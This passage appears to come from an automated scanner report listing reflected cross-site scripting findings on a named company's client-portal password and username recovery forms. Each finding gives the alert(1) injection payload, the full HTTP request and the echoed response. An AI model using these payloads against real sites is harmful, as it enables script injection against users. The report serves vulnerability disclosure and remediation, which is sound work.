Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.dstglobalsolutions.com/investmentmanagementsolutions.cfm?tab_id=3#tablist
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-3; __utma=49912755.1025025474.1317843940.1317843940.1317843940.1; __utmb=49912755.3.10.1317843940; __utmc=49912755; __utmz=49912755.1317843940.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:45:34 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19258
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/web/home.nsf/?1dfa2"><script>alert(1)</script>f11387889d2=1" name="RedirectTo" />
...[SNIP]...

3.89. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw [OpenForm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/forgotpw

Issue detail

The value of the OpenForm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e8fc4'-alert(1)-'3f3ecb669ce was submitted in the OpenForm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Registration.nsf/forgotpw?OpenForme8fc4'-alert(1)-'3f3ecb669ce HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.3.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:22 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19147
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/registration.nsf/forgotpw?openforme8fc4'-alert(1)-'3f3ecb669ce'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.90. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw [OpenForm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/forgotpw

Issue detail

The value of the OpenForm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8d41"><script>alert(1)</script>17cc96b90c8 was submitted in the OpenForm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Registration.nsf/forgotpw?OpenFormd8d41"><script>alert(1)</script>17cc96b90c8 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.3.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:18 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19207
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw?OpenFormd8d41"><script>alert(1)</script>17cc96b90c8" name="RedirectTo" />
...[SNIP]...

3.91. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/forgotpw

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 98d1e"><script>alert(1)</script>79ae44372ae was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Registration.nsf/forgotpw98d1e"><script>alert(1)</script>79ae44372ae?OpenForm HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.3.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:41 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19233
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw98d1e"><script>alert(1)</script>79ae44372ae?OpenForm" name="RedirectTo" />
...[SNIP]...

3.92. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/forgotpw

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e2801'%3bb3bb804ad0e was submitted in the REST URL parameter 2. This input was echoed as e2801';b3bb804ad0e in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Registration.nsf/forgotpwe2801'%3bb3bb804ad0e?OpenForm HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.3.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:42 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19140
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
agent&to=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/registration.nsf/forgotpwe2801';b3bb804ad0e?openform'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.93. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/forgotpw

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bb440"><script>alert(1)</script>374bab39861 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Registration.nsf/forgotpw?OpenForm&bb440"><script>alert(1)</script>374bab39861=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.3.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:30 GMT
Last-Modified: Wed, 05 Oct 2011 19:46:28 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 22940
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Forgotten Password Request</title>
   <base href="http://clientcentre.dstgl
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw?OpenForm&bb440"><script>alert(1)</script>374bab39861=1" name="RedirectTo" />
...[SNIP]...

3.94. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotpw [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/forgotpw

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 784f0'-alert(1)-'f511029aa62 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Registration.nsf/forgotpw?OpenForm&784f0'-alert(1)-'f511029aa62=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.3.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:34 GMT
Last-Modified: Wed, 05 Oct 2011 19:46:32 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 22851
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Forgotten Password Request</title>
   <base href="http://clientcentre.dstgl
...[SNIP]...
+ '~' + cServer
                       }
//                        alert(redir)
                       location = (redir)                
                   }
               }
           }

           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/registration.nsf/forgotpw?openform&784f0'-alert(1)-'f511029aa62=1'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.95. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername [OpenForm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/forgotusername

Issue detail

The value of the OpenForm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 74c82'-alert(1)-'746a4e367a2 was submitted in the OpenForm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Registration.nsf/forgotusername?OpenForm74c82'-alert(1)-'746a4e367a2 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.4.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:23 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19171
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
erverNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/registration.nsf/forgotusername?openform74c82'-alert(1)-'746a4e367a2'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.96. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername [OpenForm parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/forgotusername

Issue detail

The value of the OpenForm request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56101"><script>alert(1)</script>b1838b56821 was submitted in the OpenForm parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Registration.nsf/forgotusername?OpenForm56101"><script>alert(1)</script>b1838b56821 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.4.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:19 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19231
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername?OpenForm56101"><script>alert(1)</script>b1838b56821" name="RedirectTo" />
...[SNIP]...

3.97. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/forgotusername

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fd424'%3b10098646869 was submitted in the REST URL parameter 2. This input was echoed as fd424';10098646869 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Registration.nsf/forgotusernamefd424'%3b10098646869?OpenForm HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.4.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 404 Not Found
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:44 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19170
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
to=' + cServerNo + '~' + cServer
                           }
                           location = (redir)                
                       }
                   }
               }
           }
           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/registration.nsf/forgotusernamefd424';10098646869?openform'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.98. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/forgotusername

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d8450"><script>alert(1)</script>936174fc4c8 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Registration.nsf/forgotusernamed8450"><script>alert(1)</script>936174fc4c8?OpenForm HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.4.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 500 Internal Server Error
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:43 GMT
Connection: close
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=US-ASCII
Content-Length: 19257
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Client Centre</title>
   <base href="http://clientcentre.dstglobalsolutions
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusernamed8450"><script>alert(1)</script>936174fc4c8?OpenForm" name="RedirectTo" />
...[SNIP]...

3.99. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/forgotusername

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 786d3'-alert(1)-'5d32a6e71ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Registration.nsf/forgotusername?OpenForm&786d3'-alert(1)-'5d32a6e71ee=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.4.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:36 GMT
Last-Modified: Wed, 05 Oct 2011 19:46:34 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 22477
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Forgotten Username Request</title>
   <base href="http://clientcentre.dstgl
...[SNIP]...
+ cServer
                       }
//                        alert(redir)
                       location = (redir)                
                   }
               }
           }

           Server_Name= "clientcentre.dstglobalsolutions.com" ;
           path_info= '/registration.nsf/forgotusername?openform&786d3'-alert(1)-'5d32a6e71ee=1'
           HTTP_Referer = 'http://clientcentre.dstglobalsolutions.com/'
           RedirectTo = ''

   </script>
...[SNIP]...

3.100. http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://clientcentre.dstglobalsolutions.com
Path:   /Registration.nsf/forgotusername

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1cb5"><script>alert(1)</script>bd544f0e119 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Registration.nsf/forgotusername?OpenForm&e1cb5"><script>alert(1)</script>bd544f0e119=1 HTTP/1.1
Host: clientcentre.dstglobalsolutions.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://clientcentre.dstglobalsolutions.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __unam=f22a2f4-132d59eb0f1-33f3dd49-4; __utma=242379933.1468429912.1317843995.1317843995.1317843995.1; __utmb=242379933.4.10.1317843995; __utmc=242379933; __utmz=242379933.1317843995.1.1.utmcsr=dstglobalsolutions.com|utmccn=(referral)|utmcmd=referral|utmcct=/investmentmanagementsolutions.cfm

Response

HTTP/1.1 200 OK
Server: Lotus-Domino
Date: Wed, 05 Oct 2011 19:46:32 GMT
Last-Modified: Wed, 05 Oct 2011 19:46:30 GMT
Expires: Tue, 01 Jan 1980 06:00:00 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 22566
Cache-control: no-cache

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>


   <title>Forgotten Username Request</title>
   <base href="http://clientcentre.dstgl
...[SNIP]...
<input type="hidden" id="RedirectTo" value="http://clientcentre.dstglobalsolutions.com/Registration.nsf/forgotusername?OpenForm&e1cb5"><script>alert(1)</script>bd544f0e119=1" name="RedirectTo" />
...[SNIP]...

